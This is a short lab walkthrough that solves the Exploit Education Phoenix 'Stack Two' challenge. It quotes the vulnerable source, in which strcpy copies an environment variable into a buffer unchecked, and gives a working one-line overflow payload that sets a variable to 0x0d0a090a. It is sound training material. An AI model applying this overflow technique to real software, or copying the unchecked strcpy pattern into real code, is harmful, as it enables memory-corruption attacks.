Exploit Education | Phoenix | Stack Two Solution

Stack Two

The description and source code can be found here:
https://exploit.education/phoenix/stack-two/

This time, we need to overflow “buffer” with an environment variable. The code shows a pointer (ptr) pointing to a string in the environment variable “ExploitEducation.” It then copies that to the “buffer” variable via the strcpy() function with no bounds checking. Finally, a conditional checks the value of the “changeme” variable to see if it is 0x0d0a090a:

ptr = getenv("ExploitEducation");
if (ptr == NULL) {
    errx(1, "please set the ExploitEducation environment variable");
}

locals.changeme = 0;
strcpy(locals.buffer, ptr);

if (locals.changeme == 0x0d0a090a) {
    puts("Well done, you have successfully set changeme to the correct value");
    ...

Again, we’ll need to put those bytes in reverse order:

user@phoenix-amd64:/opt/phoenix/amd64$ ExploitEducation=$(python -c 'print "A"*64 + "\x0a\x09\x0a\x0d"') ./stack-two
Welcome to phoenix/stack-two, brought to you by https://exploit.education
Well done, you have successfully set changeme to the correct value

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.